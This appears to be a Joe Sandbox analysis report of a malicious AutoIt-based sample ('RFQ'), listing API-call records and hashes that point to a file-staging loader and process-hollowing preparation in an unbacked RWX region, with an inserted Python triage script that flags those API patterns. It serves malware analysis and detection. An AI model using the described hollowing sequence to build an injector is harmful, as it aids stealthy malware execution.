                                                                          • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                          • Instruction Fuzzy Hash: 29A10A74E01209EBDB14DFA4C894BEEBBB9BF48305F20819DE501BB280D775AA81DF55

                                                                          Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost)
                                                                          • Function 40e4c0: block 40e4c0-40e4e5 call 403350, RegOpenKeyExW; 427190-4271ae RegQueryValueExW; 4271b0-4271f5 call 4115d7, call 43652f, RegQueryValueExW; 4271f7-42720e call 402160; 427210-427219 call 436508; 42721a-42722a RegCloseKey.
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                          • API String ID: 1586453840-614718249
                                                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                          Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost)
                                                                          • Function 410570: single block 410570-4105f1, CreateWindowExW * 2, ShowWindow * 2.
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

                                                                          Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost)
                                                                          • Function 40323f8: block 40323f8-403256c call 4030048, call 40322e8, CreateFileW; 403258a-40325a4 VirtualAlloc; 40325a8-40325bf ReadFile; 40325c3-40325fd call 4032328, call 40312e8; 40325ff-4032614 call 4032378; 4032619-4032621 ExitProcess.
                                                                          APIs
                                                                            • Part of subcall function 040322E8: Sleep.KERNELBASE(000001F4), ref: 040322F9
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0403255F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: IBRHLVPXHZSJ2YHEL7DL697DVXJRU
                                                                          • API String ID: 2694422964-3350424600
                                                                          • Opcode ID: 044663121cafe2973659db2fc88cfdd81d74b9906da7b22167c6561b5cf46e66
                                                                          • Instruction ID: a9c2f09a50a47bb9c547f241f82e89bbb3214204953e3daf1a47349b6ae0478d
                                                                          • Opcode Fuzzy Hash: 044663121cafe2973659db2fc88cfdd81d74b9906da7b22167c6561b5cf46e66
                                                                          • Instruction Fuzzy Hash: 55618330D04288DAEF11DBB4D844BDEBFB9AF19305F04419DE6487B2C1D7B91A49CB66
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$OpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 1607946009-824357125
                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 3170942423-0
                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 04031AA3
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04031B39
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04031B5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                          • Instruction ID: d86496225db361e32cdea7b48e450a81d0c7ac71a6afd20b845d28b10e252171
                                                                          • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                          • Instruction Fuzzy Hash: 90620B30A14258DBEB24CFA4C840BDEB776EF58705F1091A9D10DFB290E776AE81CB59
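Added triage example; this is not part of the Joe Sandbox report and not Joe Sandbox tooling. Two records in this section deserve to be read together: the function at 04032678 (CreateFileW, VirtualAlloc, ReadFile, VirtualFree: a file read into freshly allocated memory) and the function at 04031AA3 (CreateProcessW, then Wow64GetThreadContext with 00010007, which is CONTEXT_FULL for x86, then a 4-byte ReadProcessMemory, the size of a 32-bit pointer, consistent with reading the child's PEB image base before writing a new image into it). Both live in the region at 04030000 whose dump name records PAGE_EXECUTE_READWRITE and MEM_PRIVATE and which is "based on PE: false", whereas the registry key Software\AutoIt v3\AutoIt\Include and the hidden "AutoIt v3" window with its "edit" child are the AutoIt3 interpreter runtime in the PE-backed image at 00400000. The script below groups each "APIs" list with the "Memory Dump Source" line that follows it, classifies the region, and flags those two API patterns. Assumptions: that the fifth and seventh dot-separated fields of the .sdmp name are the region's MEMORY_BASIC_INFORMATION Protect and Type values (0x40, 0x20000 and 0x1000000 fit every dump name in this section, but the field layout is inferred, not documented here); the sample lines are constructed from this section, with the VirtualAlloc and ReadFile lines standing in for the blocks shown in the control-flow graph of 04032678 and their arguments left as "?" because the report does not list them.

```python
"""Triage helper for Joe Sandbox 'APIs' + 'Memory Dump Source' records.

Added example, not Joe Sandbox code. ASSUMPTION: in the .sdmp file name the
5th and 7th dot-separated fields are the region's Protect and Type values
(MEMORY_BASIC_INFORMATION); inferred from the values in this report only.
"""
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# Matches "CreateFileW.KERNELBASE(args), ref: 04032749" as well as the
# paren-less "_wcsncpy.LIBCMT ref: 004102ED" form; subcall lines match too.
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
DUMP_RE = re.compile(
    r"Source File:\s*(?P<name>\S+)\.sdmp,\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")

# Constructed input in the shape of this report section (see lead-in).
SAMPLE = r"""
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04032749
• VirtualAlloc.KERNELBASE(?), ref: 0403278B
• ReadFile.KERNELBASE(?), ref: 040327A9
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0403296F
• Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
• CreateProcessW.KERNELBASE(?,00000000), ref: 04031AA3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04031B39
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04031B5B
• Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""


@dataclass
class FunctionRecord:
    base: int = 0
    pe_backed: bool = True
    protect: int = 0
    mem_type: int = 0
    apis: list = field(default_factory=list)  # (api, module, ref) in report order


def parse_report(text):
    """Group API-call lines with the 'Memory Dump Source' line that closes them."""
    records, current = [], FunctionRecord()
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            current.apis.append((m["api"], m["mod"], int(m["ref"], 16)))
            continue
        m = DUMP_RE.search(line)
        if m:
            fields = m["name"].split(".")
            current.base = int(m["base"], 16)
            current.pe_backed = m["pe"] == "true"
            current.protect = int(fields[4], 16)   # assumption: Protect field
            current.mem_type = int(fields[6], 16)  # assumption: Type field
            records.append(current)
            current = FunctionRecord()
    return records


def region_tags(rec):
    """Describe the memory region a function was dumped from."""
    tags = set()
    if rec.protect == PAGE_EXECUTE_READWRITE:
        tags.add("rwx")
    if rec.mem_type == MEM_PRIVATE:
        tags.add("private")
    elif rec.mem_type == MEM_IMAGE:
        tags.add("image")
    if not rec.pe_backed:
        tags.add("no-pe-header")
    return tags


# A rule fires when at least one API from every group is present in the function.
RULES = {
    "process-hollowing-prep": [
        {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
        {"GetThreadContext", "Wow64GetThreadContext", "NtGetContextThread"},
        {"ReadProcessMemory", "NtReadVirtualMemory"},
    ],
    "file-to-memory-staging": [
        {"CreateFileW", "CreateFileA"},
        {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"ReadFile", "NtReadFile"},
    ],
}


def findings(records):
    """Return one line per rule hit, plus one per function that runs from unbacked RWX memory."""
    out = []
    for rec in records:
        names = {api for api, _, _ in rec.apis}
        tags = region_tags(rec)
        unbacked = {"rwx", "private", "no-pe-header"} <= tags
        where = "unbacked RWX private region" if unbacked else "/".join(sorted(tags)) or "unknown region"
        for rule, groups in RULES.items():
            if all(names & g for g in groups):
                out.append(f"{rule} at 0x{rec.base:08X} ({where})")
        if unbacked and names:
            out.append(f"api-calls-from-unbacked-rwx at 0x{rec.base:08X}: {', '.join(sorted(names))}")
    return out


if __name__ == "__main__":
    for line in findings(parse_report(SAMPLE)):
        print(line)
```

Run against the sample it reports both patterns at 0x04030000 and nothing for the AutoIt runtime function in the 0x00400000 image; the same parser can be fed the whole report text, since "Associated:" lines do not match DUMP_RE and only "Source File:" lines close a record. The per-function "Opcode ID" and fuzzy hashes in this section are the better pivot for finding the same loader in other reports; the API-sequence rules above are a coarse first pass, not a signature.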
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: Error:
                                                                          • API String ID: 4104443479-232661952
                                                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                          APIs
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                          • String ID: X$pWH
                                                                          • API String ID: 85490731-941433119
                                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                          • String ID: @EXITCODE
                                                                          • API String ID: 2734553683-3436989551
                                                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                          • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1794320848-0
                                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                          Similarity
                                                                          • API ID: Process$CurrentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2429186680-0
                                                                          • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                          • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                          Similarity
                                                                          • API ID: _malloc$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 680241177-0
                                                                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                          APIs
                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                          • _free.LIBCMT ref: 004295A0
                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                          • API String ID: 3938964917-2806939583
                                                                          • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                          • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                          Strings
                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                          Similarity
                                                                          • API ID: _strcat
                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                          • API String ID: 1765576173-2684727018
                                                                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                          Similarity
                                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                                          • String ID:
                                                                          • API String ID: 4163294574-0
                                                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                          APIs
                                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                          • _strcat.LIBCMT ref: 0040F786
